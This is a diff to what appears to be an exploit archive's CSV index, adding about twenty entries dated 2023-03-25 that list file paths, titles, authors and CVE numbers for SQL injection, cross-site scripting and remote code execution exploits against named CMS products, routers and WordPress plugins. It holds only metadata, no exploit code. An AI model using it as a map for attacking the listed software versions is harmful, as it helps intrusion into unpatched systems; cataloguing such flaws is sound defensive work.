@ -1395,6 +1395,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
13814,exploits/asp/webapps/13814.txt,"Pars Design CMS - Arbitrary File Upload",2010-06-10,Securitylab.ir,webapps,asp,,2010-06-09,,1,,,,,,
6610,exploits/asp/webapps/6610.txt,"ParsaWeb CMS - 'Search' SQL Injection",2008-09-28,BugReport.IR,webapps,asp,,2008-09-27,,1,OSVDB-48664;CVE-2008-4364,,,,,http://www.bugreport.ir/index_53.htm
32604,exploits/asp/webapps/32604.txt,"ParsBlogger - 'blog.asp' Cross-Site Scripting",2008-11-29,Pouya_Server,webapps,asp,,2008-11-29,2014-03-31,1,OSVDB-106992,,,,,https://www.securityfocus.com/bid/32529/info
51055,exploits/asp/webapps/51055.txt,"Password Manager for IIS v2.0 - XSS",2023-03-25,VP4TR10T,webapps,asp,,2023-03-25,2023-03-25,0,CVE-2022-36664,,,,,
12833,exploits/asp/webapps/12833.txt,"Patient folder (THEME ASP) - SQL Injection",2010-05-31,"SA H4x0r",webapps,asp,,2010-05-30,,1,,,,,,
30427,exploits/asp/webapps/30427.txt,"Pay Roll Time Sheet and Punch Card Application With Web UI - 'login.asp' SQL Injection",2007-07-28,"Aria-Security Team",webapps,asp,,2007-07-28,2013-12-23,1,CVE-2007-4106;OSVDB-36289,,,,,https://www.securityfocus.com/bid/25114/info
32151,exploits/asp/webapps/32151.pl,"Pcshey Portal - 'kategori.asp' SQL Injection",2008-08-04,U238,webapps,asp,,2008-08-04,2014-03-10,1,CVE-2008-3495;OSVDB-47446,,,,,https://www.securityfocus.com/bid/30534/info
@ -3014,6 +3015,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
43119,exploits/hardware/dos/43119.py,"Debut Embedded HTTPd 1.20 - Denial of Service",2017-11-02,z00n,dos,hardware,,2017-11-06,2017-11-06,0,CVE-2017-16249,,,,,
44965,exploits/hardware/dos/44965.py,"Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (PoC)",2018-07-02,t4rkd3vilz,dos,hardware,80,2018-07-02,2018-07-02,0,CVE-2018-10594,"Buffer Overflow",,,,
44934,exploits/hardware/dos/44934.txt,"DIGISOL DG-BR4000NG - Buffer Overflow (PoC)",2018-06-25,"Adipta Basu",dos,hardware,,2018-06-25,2018-06-25,0,CVE-2018-12706,,,,,
51053,exploits/hardware/dos/51053.txt,"DLink DIR 819 A1 - Denial of Service",2023-03-25,whokilleddb,dos,hardware,,2023-03-25,2023-03-25,0,CVE-2022-40946,,,,,
32305,exploits/hardware/dos/32305.txt,"Dreambox - Web Interface URI Remote Denial of Service",2008-08-29,"Marc Ruef",dos,hardware,,2008-08-29,2014-03-17,1,,,,,,https://www.securityfocus.com/bid/30919/info
19513,exploits/hardware/dos/19513.txt,"Eicon Networks DIVA LAN ISDN Modem 1.0 Release 2.5/1.0/2.0 - Denial of Service",1999-09-27,"Bjorn Stickler",dos,hardware,,1999-09-27,2012-07-01,1,CVE-1999-1533;OSVDB-13556,,,,,https://www.securityfocus.com/bid/665/info
18688,exploits/hardware/dos/18688.txt,"EMC Data Protection Advisor 5.8.1 - Denial of Service",2012-03-31,"Luigi Auriemma",dos,hardware,,2012-03-31,2012-03-31,1,OSVDB-80815;OSVDB-80814;CVE-2012-0407;CVE-2012-0406,,,,,http://www.emc.com/backup-and-recovery/data-protection-advisor/data-protection-advisor.htm
@ -3484,6 +3486,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
38725,exploits/hardware/remote/38725.txt,"D-Link DIR-880L - Multiple Buffer Overflow Vulnerabilities",2015-11-16,"Samuel Huntley",remote,hardware,80,2015-11-16,2015-11-16,0,OSVDB-130405;OSVDB-130400,,,,,http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060
38716,exploits/hardware/remote/38716.txt,"D-Link DIR-890L/R - Multiple Buffer Overflow Vulnerabilities",2015-11-16,"Samuel Huntley",remote,hardware,80,2015-11-16,2015-11-16,0,,,,,,http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060
33471,exploits/hardware/remote/33471.txt,"D-Link DKVM-IP8 - 'auth.asp' Cross-Site Scripting",2010-01-06,POPCORN,remote,hardware,,2010-01-06,2014-05-22,1,CVE-2010-0936;OSVDB-61615,,,,,https://www.securityfocus.com/bid/37646/info
51046,exploits/hardware/remote/51046.txt,"D-Link DNR-322L <=2.60B15 - Authenticated Remote Code Execution",2023-03-25,luka,remote,hardware,,2023-03-25,2023-03-25,0,,,,,,
43434,exploits/hardware/remote/43434.txt,"D-Link DNS-320 ShareCenter < 1.06 - Backdoor Access",2018-01-03,"GulfTech Security",remote,hardware,,2018-01-05,2018-01-05,0,GTSA-00126,,,,,http://gulftech.org/advisories/DNS-320L%20ShareCenter%20Backdoor/126
25684,exploits/hardware/remote/25684.html,"D-Link DSL Router - Remote Authentication Bypass",2005-05-19,"Francesco Orro",remote,hardware,,2005-05-19,2013-05-24,1,CVE-2005-1827;OSVDB-16691,,,,,https://www.securityfocus.com/bid/13679/info
40735,exploits/hardware/remote/40735.sh,"D-Link DSL-2730U/2750U/2750E ADSL Router - Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware,,2016-11-08,2017-09-15,0,,,,,,
@ -13083,6 +13086,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
20788,exploits/php/webapps/20788.txt,"AB Banner Exchange - 'index.php' Local File Inclusion",2012-08-24,"Yakir Wizman",webapps,php,,2012-08-24,2012-08-24,1,OSVDB-84931,,,,,
16044,exploits/php/webapps/16044.txt,"ab Web CMS 1.35 - Multiple Vulnerabilities",2011-01-25,"Dr.0rYX & Cr3W-DZ",webapps,php,,2011-01-25,2011-01-25,0,,,,,,
40877,exploits/php/webapps/40877.md,"AbanteCart 1.2.7 - Cross-Site Scripting",2016-12-06,"Kacper Szurek",webapps,php,,2016-12-06,2016-12-06,0,,,,,,
51058,exploits/php/webapps/51058.txt,"Abantecart v1.3.2 - Authenticated Remote Code Execution",2023-03-25,"Sarang Tumne",webapps,php,,2023-03-25,2023-03-25,0,CVE-2022-26521,,,,,
27934,exploits/php/webapps/27934.txt,"Abarcar Realty Portal 5.1.5 - 'content.php' SQL Injection",2006-06-01,SpC-x,webapps,php,,2006-06-01,2013-08-29,1,CVE-2006-2853;OSVDB-26226,,,,,https://www.securityfocus.com/bid/18218/info
28944,exploits/php/webapps/28944.txt,"Abarcar Realty Portal 5.1.5/6.0.1 - Multiple SQL Injections",2006-11-08,"Benjamin Moss",webapps,php,,2006-11-08,2013-10-14,1,,,,,,https://www.securityfocus.com/bid/20970/info
8555,exploits/php/webapps/8555.txt,"ABC Advertise 1.0 - Admin Password Disclosure",2009-04-27,SirGod,webapps,php,,2009-04-26,,1,OSVDB-54287;CVE-2009-1550,,,,,
@ -14926,6 +14930,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50543,exploits/php/webapps/50543.txt,"Bus Pass Management System 1.0 - 'Search' SQL injection",2021-11-23,"Abhijeet Singh",webapps,php,,2021-11-23,2021-11-23,0,,,,,,
50263,exploits/php/webapps/50263.txt,"Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)",2021-09-06,sudoninja,webapps,php,,2021-09-06,2021-09-06,0,,,,,,
50235,exploits/php/webapps/50235.txt,"Bus Pass Management System 1.0 - 'viewid' SQL Injection",2021-08-30,"Aryan Chehreghani",webapps,php,,2021-08-30,2021-08-30,0,,,,,,
51054,exploits/php/webapps/51054.txt,"Bus Pass Management System 1.0 - Cross-Site Scripting (XSS)",2023-03-25,"Ali Alipour",webapps,php,,2023-03-25,2023-03-25,0,CVE-2022-35155,,,,,
9633,exploits/php/webapps/9633.txt,"Bus Script - 'sitetext_id' SQL Injection",2009-09-10,Mr.SQL,webapps,php,,2009-09-09,,1,OSVDB-57985;CVE-2009-4618;OSVDB-57984,,,,,
41561,exploits/php/webapps/41561.txt,"Busewe 1.2 - SQL Injection",2017-03-09,"Ihsan Sencan",webapps,php,,2017-03-09,2017-03-09,0,,,,,,
41097,exploits/php/webapps/41097.txt,"Business Directory Script - SQL Injection",2017-01-18,"Ihsan Sencan",webapps,php,,2017-01-18,2017-01-18,0,,,,,,
@ -15856,6 +15861,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48496,exploits/php/webapps/48496.txt,"Composr CMS 10.0.30 - Persistent Cross-Site Scripting",2020-05-21,"Manuel García Cárdenas",webapps,php,,2020-05-21,2020-05-21,0,,,,,,
49190,exploits/php/webapps/49190.txt,"Composr CMS 10.0.34 - 'banners' Persistent Cross Site Scripting",2020-12-04,"Parshwa Bhavsar",webapps,php,,2020-12-04,2020-12-04,0,,,,,,
49749,exploits/php/webapps/49749.txt,"Composr CMS 10.0.36 - Cross Site Scripting",2021-04-07,"Orion Hridoy",webapps,php,,2021-04-07,2021-04-07,0,CVE-2021-30150,,,,,
51060,exploits/php/webapps/51060.txt,"Composr-CMS Version <=10.0.39 - Authenticated Remote Code Execution",2023-03-25,"Sarang Tumne",webapps,php,,2023-03-25,2023-03-25,0,CVE-2021-46360,,,,,
2503,exploits/php/webapps/2503.txt,"compteur 2.0 - 'param_editor.php' Remote File Inclusion",2006-10-10,DarkFig,webapps,php,,2006-10-09,,1,OSVDB-29617;CVE-2006-5259,,,,,
34536,exploits/php/webapps/34536.txt,"CompuCMS - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2010-08-26,"High-Tech Bridge SA",webapps,php,,2010-08-26,2014-09-05,1,,,,,,https://www.securityfocus.com/bid/42773/info
33178,exploits/php/webapps/33178.txt,"Computer Associates SiteMinder - '%00' Cross-Site Scripting Protection Security Bypass",2009-06-08,"Arshan Dabirsiaghi",webapps,php,,2009-06-08,2014-05-04,1,CVE-2009-2704;OSVDB-56970,,,,,https://www.securityfocus.com/bid/36086/info
@ -17543,6 +17549,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48882,exploits/php/webapps/48882.txt,"Employee Management System 1.0 - Authentication Bypass",2020-10-16,"Ankita Pal",webapps,php,,2020-10-16,2020-10-16,0,,,,,,
48881,exploits/php/webapps/48881.txt,"Employee Management System 1.0 - Cross Site Scripting (Stored)",2020-10-16,"Ankita Pal",webapps,php,,2020-10-16,2020-10-16,0,,,,,,
49215,exploits/php/webapps/49215.txt,"Employee Performance Evaluation System 1.0 - 'Task and Description' Persistent Cross Site Scripting",2020-12-08,"Ritesh Gohil",webapps,php,,2020-12-08,2020-12-08,0,,,,,,
51049,exploits/php/webapps/51049.txt,"Employee Performance Evaluation System v1.0 - File Inclusion and RCE",2023-03-25,nu11secur1ty,webapps,php,,2023-03-25,2023-03-25,0,,,,,,
50467,exploits/php/webapps/50467.txt,"Employee Record Management System 1.2 - 'empid' SQL injection (Unauthenticated)",2021-11-02,"Anubhav Singh",webapps,php,,2021-11-02,2021-11-02,0,,,,,,
50112,exploits/php/webapps/50112.txt,"Employee Record Management System 1.2 - Stored Cross-Site Scripting (XSS)",2021-07-08,"Subhadip Nag",webapps,php,,2021-07-08,2021-07-08,0,,,,,,
49280,exploits/php/webapps/49280.txt,"Employee Record System 1.0 - Multiple Stored XSS",2020-12-17,"Saeed Bala Ahmed",webapps,php,,2020-12-17,2020-12-17,0,,,,,,
@ -19039,6 +19046,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
4602,exploits/php/webapps/4602.txt,"GuppY 4.6.3 - 'index.php?selskin' Remote File Inclusion",2007-11-03,irk4z,webapps,php,,2007-11-02,2017-11-03,1,OSVDB-38492;CVE-2007-5845;OSVDB-38491;CVE-2007-5844,,,,,
36099,exploits/php/webapps/36099.html,"GuppY CMS 5.0.9 < 5.00.10 - Multiple Cross-Site Request Forgery Vulnerabilities",2015-02-17,"Brandon Murphy",webapps,php,80,2015-02-17,2015-02-17,0,OSVDB-118489;OSVDB-118488,,,,,
36098,exploits/php/webapps/36098.html,"Guppy CMS 5.0.9/5.00.10 - Authentication Bypass/Change Email",2015-02-17,"Brandon Murphy",webapps,php,80,2015-02-17,2015-02-17,0,OSVDB-118487,,,,,
51052,exploits/php/webapps/51052.txt,"GuppY CMS v6.00.10 - Remote Code Execution",2023-03-25,"Chokri Hammedi",webapps,php,,2023-03-25,2023-03-25,0,,,,,,
23673,exploits/php/webapps/23673.txt,"Guru Auction 2.0 - Multiple SQL Injections",2012-12-26,v3n0m,webapps,php,,2012-12-26,2012-12-26,1,OSVDB-88753;OSVDB-88752,,,,,
17350,exploits/php/webapps/17350.txt,"Guru JustAnswer Professional 1.25 - Multiple SQL Injections",2011-05-30,v3n0m,webapps,php,,2011-05-30,2011-05-30,1,OSVDB-72734;OSVDB-72733,,,,,
17336,exploits/php/webapps/17336.txt,"Guru Penny Auction Pro 3.0 - Blind SQL Injection",2011-05-28,v3n0m,webapps,php,,2011-05-28,2011-05-28,1,OSVDB-72736,,,,,
@ -19314,6 +19322,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
34412,exploits/php/webapps/34412.txt,"Hulihan Applications BXR 0.6.8 - SQL Injection / HTML Injection",2010-08-05,"High-Tech Bridge SA",webapps,php,,2010-08-05,2014-08-26,1,CVE-2010-4963;OSVDB-67054,,,,,https://www.securityfocus.com/bid/42247/info
49854,exploits/php/webapps/49854.txt,"Human Resource Information System 0.1 - 'First Name' Persistent Cross-Site Scripting (Authenticated)",2021-05-10,"Reza Afsahi",webapps,php,,2021-05-10,2021-05-10,0,,,,,,
49847,exploits/php/webapps/49847.py,"Human Resource Information System 0.1 - Remote Code Execution (Unauthenticated)",2021-05-07,"Reza Afsahi",webapps,php,,2021-05-07,2021-05-07,0,,,,,,
51047,exploits/php/webapps/51047.txt,"Human Resources Management System v1.0 - Multiple SQLi",2023-03-25,"Abdulhakim Öner",webapps,php,,2023-03-25,2023-03-25,0,,,,,,
9494,exploits/php/webapps/9494.txt,"humanCMS - Authentication Bypass",2009-08-24,next,webapps,php,,2009-08-23,,1,,,,,,
35511,exploits/php/webapps/35511.txt,"Humhub 0.10.0-rc.1 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-12-10,"Jos Wetzels_ Emiel Florijn",webapps,php,,2014-12-10,2014-12-10,0,OSVDB-115638;OSVDB-115637;OSVDB-115636,,,,,
35510,exploits/php/webapps/35510.txt,"Humhub 0.10.0-rc.1 - SQL Injection",2014-12-10,"Jos Wetzels_ Emiel Florijn",webapps,php,,2014-12-10,2014-12-10,0,OSVDB-115635;CVE-2014-9528,,,,,
@ -19573,6 +19582,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
39737,exploits/php/webapps/39737.txt,"ImpressCMS 1.3.9 - SQL Injection",2016-04-26,"Manuel García Cárdenas",webapps,php,80,2016-04-26,2016-04-26,0,,,,,http://www.exploit-db.comimpresscms-1.3.9.tar.gz,
50839,exploits/php/webapps/50839.php,"ImpressCMS 1.4.2 - Remote Code Execution (RCE)",2022-03-30,"Egidio Romano",webapps,php,,2022-03-30,2022-03-30,0,CVE-2021-26599,,,,,
50298,exploits/php/webapps/50298.py,"ImpressCMS 1.4.2 - Remote Code Execution (RCE) (Authenticated)",2021-09-16,"Halit AKAYDIN",webapps,php,,2021-09-16,2021-09-16,0,,,,,,
51056,exploits/php/webapps/51056.txt,"ImpressCMS v1.4.3 - Authenticated SQL Injection",2023-03-25,"Sarang Tumne",webapps,php,,2023-03-25,2023-03-25,0,CVE-2022-26986,,,,,
50890,exploits/php/webapps/50890.txt,"ImpressCMS v1.4.4 - Unrestricted File Upload",2022-05-11,"Ünsal Furkan Harani",webapps,php,,2022-05-11,2022-05-11,0,,,,,,
34053,exploits/php/webapps/34053.txt,"ImpressPages CMS 1.0x - 'admin.php' Multiple SQL Injections",2010-05-28,"High-Tech Bridge SA",webapps,php,,2010-05-28,2014-07-14,1,,,,,,https://www.securityfocus.com/bid/40431/info
29331,exploits/php/webapps/29331.txt,"ImpressPages CMS 3.6 - 'manage()' Remote Code Execution",2013-11-01,LiquidWorm,webapps,php,,2013-11-02,2013-11-02,0,OSVDB-99274,,,,,http://zeroscience.mk/en/vulnerabilities/ZSL-2013-5159.php
@ -21988,6 +21998,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
23620,exploits/php/webapps/23620.txt,"Laurent Adda Les Commentaires 2.0 - PHP Script 'derniers_commentaires.php' Remote File Inclusion",2004-01-30,"Himeur Nourredine",webapps,php,,2004-01-30,2012-12-24,1,CVE-2004-0246;OSVDB-15990,,,,,https://www.securityfocus.com/bid/9536/info
23619,exploits/php/webapps/23619.txt,"Laurent Adda Les Commentaires 2.0 - PHP Script 'fonctions.lib.php' Remote File Inclusion",2004-01-30,"Himeur Nourredine",webapps,php,,2004-01-30,2012-12-24,1,CVE-2004-0246;OSVDB-3797,,,,,https://www.securityfocus.com/bid/9536/info
3870,exploits/php/webapps/3870.txt,"LaVague 0.3 - 'printbar.php?views_path' Remote File Inclusion",2007-05-08,kezzap66345,webapps,php,,2007-05-07,,1,OSVDB-37790;CVE-2007-2607,,,,,
51050,exploits/php/webapps/51050.txt,"Lavalite v9.0.0 - XSRF-TOKEN cookie File path traversal",2023-03-25,nu11secur1ty,webapps,php,,2023-03-25,2023-03-25,0,,,,,,
42643,exploits/php/webapps/42643.txt,"Law Firm 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",webapps,php,,2017-09-10,2017-09-10,0,,,,,,
27202,exploits/php/webapps/27202.txt,"Lawrence Osiris DB_eSession 1.0.2 - Class SQL Injection",2006-02-13,"GulfTech Security",webapps,php,,2006-02-13,2018-01-05,1,"CVE-2006-0774;OSVDB-23104;BID: 16598;GTSA-00091",,,,,http://gulftech.org/advisories/DB_eSession%20SQL%20Injection/91
43289,exploits/php/webapps/43289.txt,"Lawyer Search Script 1.1 - 'lawyer-list?city' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80,2017-12-11,2017-12-13,1,CVE-2017-17620,"SQL Injection (SQLi)",,,,
@ -23170,6 +23181,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
34788,exploits/php/webapps/34788.txt,"MODx manager - '/controllers/default/resource/tvs.php?class_key' Traversal Local File Inclusion",2010-09-29,"John Leitch",webapps,php,,2010-09-29,2014-09-26,1,CVE-2010-5278;OSVDB-68265,,,,,https://www.securityfocus.com/bid/43577/info
45055,exploits/php/webapps/45055.py,"Modx Revolution < 2.6.4 - Remote Code Execution",2018-07-18,"Vitalii Rudnykh",webapps,php,,2018-07-18,2018-07-18,0,,,,,,
15701,exploits/php/webapps/15701.txt,"MODx REvolution CMS 2.0.4-pl2 - POST injection Cross-Site Scripting",2010-12-06,LiquidWorm,webapps,php,,2010-12-06,2010-12-06,0,OSVDB-69643,,,,,http://bugs.modx.com/issues/2918
51059,exploits/php/webapps/51059.txt,"MODX Revolution v2.8.3-pl - Authenticated Remote Code Execution",2023-03-25,"Sarang Tumne",webapps,php,,2023-03-25,2023-03-25,0,CVE-2022-26149,,,,,
4739,exploits/php/webapps/4739.pl,"MOG-WebShop - 'index.php?group' SQL Injection",2007-12-18,k1tk4t,webapps,php,,2007-12-17,,1,OSVDB-40272;CVE-2007-6466,,,,,
25304,exploits/php/webapps/25304.py,"MoinMoin - Arbitrary Command Execution",2013-05-08,HTP,webapps,php,,2013-05-08,2013-06-24,1,OSVDB-93234;CVE-2012-6495;OSVDB-88825;CVE-2012-6081,,,,http://www.exploit-db.commoin-1.9.5.tar.gz,
29915,exploits/php/webapps/29915.txt,"MoinMoin 1.5.x - 'index.php' Cross-Site Scripting",2007-04-26,"En Douli",webapps,php,,2007-04-26,2013-11-30,1,CVE-2007-2423;OSVDB-36567,,,,,https://www.securityfocus.com/bid/23676/info
@ -24018,6 +24030,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
2439,exploits/php/webapps/2439.txt,"Newswriter SW 1.42 - 'editfunc.inc.php' File Inclusion",2006-09-27,"Silahsiz Kuvvetler",webapps,php,,2006-09-26,,1,OSVDB-37965;CVE-2006-5102,,,,,
24424,exploits/php/webapps/24424.txt,"Newtelligence DasBlog 1.x - Request Log HTML Injection",2004-09-01,"Dominick Baier",webapps,php,,2004-09-01,2013-01-27,1,CVE-2004-1657;OSVDB-9453,,,,,https://www.securityfocus.com/bid/11086/info
2970,exploits/php/webapps/2970.txt,"Newxooper-PHP 0.9.1 - 'mapage.php' Remote File Inclusion",2006-12-21,3l3ctric-Cracker,webapps,php,,2006-12-20,,1,OSVDB-32400;CVE-2006-6711,,,,,
51042,exploits/php/webapps/51042.txt,"NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi",2023-03-25,"Elias Hohl",webapps,php,,2023-03-25,2023-03-25,0,CVE-2022-3142,,,,,
28580,exploits/php/webapps/28580.txt,"NextAge Cart - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-13,meto5757,webapps,php,,2006-09-13,2013-09-28,1,,,,,,https://www.securityfocus.com/bid/20040/info
27734,exploits/php/webapps/27734.txt,"NextAge Shopping Cart - Multiple HTML Injection Vulnerabilities",2006-04-25,R@1D3N,webapps,php,,2006-04-25,2013-08-21,1,CVE-2006-2051;OSVDB-25265,,,,,https://www.securityfocus.com/bid/17685/info
37012,exploits/php/webapps/37012.txt,"NextBBS 0.6 - 'ajaxserver.php' Multiple SQL Injections",2012-03-27,waraxe,webapps,php,,2012-03-27,2015-05-14,1,OSVDB-80637;CVE-2012-1603,,,,,https://www.securityfocus.com/bid/52728/info
@ -24365,6 +24378,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50660,exploits/php/webapps/50660.txt,"Online Diagnostic Lab Management System 1.0 - Account Takeover (Unauthenticated)",2022-01-13,Himash,webapps,php,,2022-01-13,2022-01-13,0,,,,,,
50662,exploits/php/webapps/50662.txt,"Online Diagnostic Lab Management System 1.0 - SQL Injection (Unauthenticated)",2022-01-13,Himash,webapps,php,,2022-01-13,2022-01-13,0,,,,,,
50661,exploits/php/webapps/50661.txt,"Online Diagnostic Lab Management System 1.0 - Stored Cross Site Scripting (XSS)",2022-01-13,Himash,webapps,php,,2022-01-13,2022-01-13,0,,,,,,
51045,exploits/php/webapps/51045.txt,"Online Diagnostic Lab Management System v1.0 - Remote Code Execution (RCE) (Unauthenticated)",2023-03-25,"yousef alraddadi",webapps,php,,2023-03-25,2023-03-25,0,,,,,,
48512,exploits/php/webapps/48512.txt,"Online Discussion Forum Site 1.0 - Remote Code Execution",2020-05-25,Enesdex,webapps,php,,2020-05-25,2020-05-25,0,,,,,,
48897,exploits/php/webapps/48897.txt,"Online Discussion Forum Site 1.0 - XSS in Messaging System",2020-10-19,j5oh,webapps,php,,2020-10-19,2020-10-19,0,,,,,,
50386,exploits/php/webapps/50386.txt,"Online DJ Booking Management System 1.0 - 'Multiple' Blind Cross-Site Scripting",2021-10-07,"Yash Mahajan",webapps,php,,2021-10-07,2021-10-07,0,,,,,,
@ -26586,6 +26600,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
24846,exploits/php/webapps/24846.txt,"phpGroupWare 0.9.x - 'viewticket_details.php?ticket_id' SQL Injection",2004-12-15,"GulfTech Security",webapps,php,,2004-12-15,2018-01-05,1,"CVE-2004-1383;OSVDB-12395;GTSA-00052;BID: 11952",,,,,http://gulftech.org/advisories/phpGroupWare%20Multiple%20Vulnerabilities/52
27658,exploits/php/webapps/27658.txt,"PHPGuestbook 0.0.2/1.0 - HTML Injection",2006-04-15,Qex,webapps,php,,2006-04-15,2013-08-18,1,,,,,,https://www.securityfocus.com/bid/17537/info
50461,exploits/php/webapps/50461.html,"PHPGurukul Hostel Management System 2.1 - Cross-site request forgery (CSRF) to Cross-site Scripting (XSS)",2021-10-28,"Anubhav Singh",webapps,php,,2021-10-28,2021-10-28,0,,,,,,
51061,exploits/php/webapps/51061.txt,"PHPGurukul Online Birth Certificate System V 1.2 - Blind XSS",2023-03-25,"Prasheek Kamble",webapps,php,,2023-03-25,2023-03-25,0,,,,,,
24217,exploits/php/webapps/24217.txt,"phpHeaven phpMyChat 0.14.5 - 'admin.php3' Arbitrary File Access",2004-06-15,HEX,webapps,php,,2004-06-15,2013-01-19,1,CVE-2004-2717;OSVDB-7150,,,,,https://www.securityfocus.com/bid/10556/info
24216,exploits/php/webapps/24216.html,"phpHeaven phpMyChat 0.14.5 - 'edituser.php3?do_not_login' Authentication Bypass",2004-06-15,HEX,webapps,php,,2004-06-15,2013-01-19,1,CVE-2004-2715;OSVDB-7149,,,,,https://www.securityfocus.com/bid/10556/info
25659,exploits/php/webapps/25659.txt,"PHPHeaven PHPMyChat 0.14.5 - 'Start-Page.CSS.php3' Cross-Site Scripting",2005-05-13,Megasky,webapps,php,,2005-05-13,2013-05-23,1,CVE-2005-1619;OSVDB-16769,,,,,https://www.securityfocus.com/bid/13627/info
@ -29110,6 +29125,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
30811,exploits/php/webapps/30811.txt,"SimpleGallery 0.1.3 - 'index.php' Cross-Site Scripting",2007-11-26,JosS,webapps,php,,2007-11-26,2014-01-10,1,CVE-2007-6157;OSVDB-39679,,,,,https://www.securityfocus.com/bid/26585/info
38115,exploits/php/webapps/38115.txt,"SimpleInvoices invoices Module - Customer Field Cross-Site Scripting",2012-12-10,tommccredie,webapps,php,,2012-12-10,2015-09-09,1,CVE-2012-4932;OSVDB-88330,,,,,https://www.securityfocus.com/bid/56882/info
9336,exploits/php/webapps/9336.txt,"SimpleLoginSys 0.5 - Authentication Bypass",2009-08-03,SirGod,webapps,php,,2009-08-02,,1,OSVDB-63093;CVE-2009-4733;OSVDB-56747,,,,,
51057,exploits/php/webapps/51057.txt,"SimpleMachinesForum v2.1.1 - Authenticated Remote Code Execution",2023-03-25,"Sarang Tumne",webapps,php,,2023-03-25,2023-03-25,0,CVE-2022-26982,,,,,
3886,exploits/php/webapps/3886.pl,"SimpleNews 1.0.0 FINAL - 'print.php?news_id' SQL Injection",2007-05-09,Silentz,webapps,php,,2007-05-08,,1,OSVDB-35910;CVE-2007-2598,,,,,
31929,exploits/php/webapps/31929.txt,"SimpleNotes - Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,sl4xUz,webapps,php,,2008-06-16,2014-02-27,1,,,,,,https://www.securityfocus.com/bid/29755/info
48424,exploits/php/webapps/48424.txt,"SimplePHPGal 0.7 - Remote File Inclusion",2020-05-05,h4shur,webapps,php,,2020-05-05,2020-05-05,0,,,,,,
@ -30505,6 +30521,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
15826,exploits/php/webapps/15826.txt,"Traidnt Up 3.0 - Cross-Site Request Forgery",2010-12-25,"P0C T34M",webapps,php,,2010-12-25,2010-12-26,0,,,,,http://www.exploit-db.comTraidnt_up_V3.0.zip,
36736,exploits/php/webapps/36736.txt,"Traidnt Up 3.0 - SQL Injection",2015-04-13,"Ali Trixx",webapps,php,,2015-04-13,2015-04-13,0,OSVDB-120607,,,,,
5848,exploits/php/webapps/5848.txt,"traindepot 0.1 - Local File Inclusion / Cross-Site Scripting",2008-06-18,"CWH Underground",webapps,php,,2008-06-17,2016-12-08,1,OSVDB-46509;CVE-2008-2839;OSVDB-46508;CVE-2008-2838,,,,,
51043,exploits/php/webapps/51043.txt,"Translatepress Multilinugal WordPress plugin < 2.3.3 - Authenticated SQL Injection",2023-03-25,"Elias Hohl",webapps,php,,2023-03-25,2023-03-25,0,CVE-2022-3141,,,,,
11155,exploits/php/webapps/11155.txt,"Transload Script - Arbitrary File Upload",2010-01-16,DigitALL,webapps,php,,2010-01-15,,1,,,,,http://www.exploit-db.comtransloader.zip,
6360,exploits/php/webapps/6360.txt,"TransLucid 1.75 - 'FCKeditor' Arbitrary File Upload",2008-09-03,BugReport.IR,webapps,php,,2008-09-02,,1,OSVDB-49430,,,,,http://www.bugreport.ir/index_51.htm
8943,exploits/php/webapps/8943.txt,"TransLucid 1.75 - Multiple Vulnerabilities",2009-06-12,intern0t,webapps,php,,2009-06-11,2016-12-21,1,OSVDB-55385;CVE-2009-2145;OSVDB-55384;OSVDB-55383,,,,,http://forum.intern0t.net/intern0t-advisories/1122-intern0t-translucid-1-75-multiple-vulnerabilities.html
@ -33826,6 +33843,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
22877,exploits/php/webapps/22877.txt,"Yii Framework 1.1.8 - Search SQL Injection",2012-11-21,Juno_okyo,webapps,php,,2012-11-21,2012-11-21,0,OSVDB-87828,,,,http://www.exploit-db.comyii-1.1.8.r3324.tar.gz,
23175,exploits/php/webapps/23175.txt,"yMonda Thread-IT 1.6 - Multiple HTML Injections",2003-09-24,"Bahaa Naamneh",webapps,php,,2003-09-24,2012-12-05,1,OSVDB-3367,,,,,https://www.securityfocus.com/bid/8692/info
41104,exploits/php/webapps/41104.txt,"Yoga and Fitness Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",webapps,php,,2017-01-18,2017-01-18,0,,,,,,
51048,exploits/php/webapps/51048.txt,"Yoga Class Registration System v1.0 - Multiple SQLi",2023-03-25,"Abdulhakim Öner",webapps,php,,2023-03-25,2023-03-25,0,,,,,,
43282,exploits/php/webapps/43282.txt,"Yoga Class Script 1.0 - 'list?city' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80,2017-12-11,2017-12-13,1,CVE-2017-17630,"SQL Injection (SQLi)",,,,
8932,exploits/php/webapps/8932.txt,"yogurt 0.3 - Cross-Site Scripting / SQL Injection",2009-06-11,Br0ly,webapps,php,,2009-06-10,,1,OSVDB-55098;CVE-2009-2034;OSVDB-55097;CVE-2009-2033,,,,,
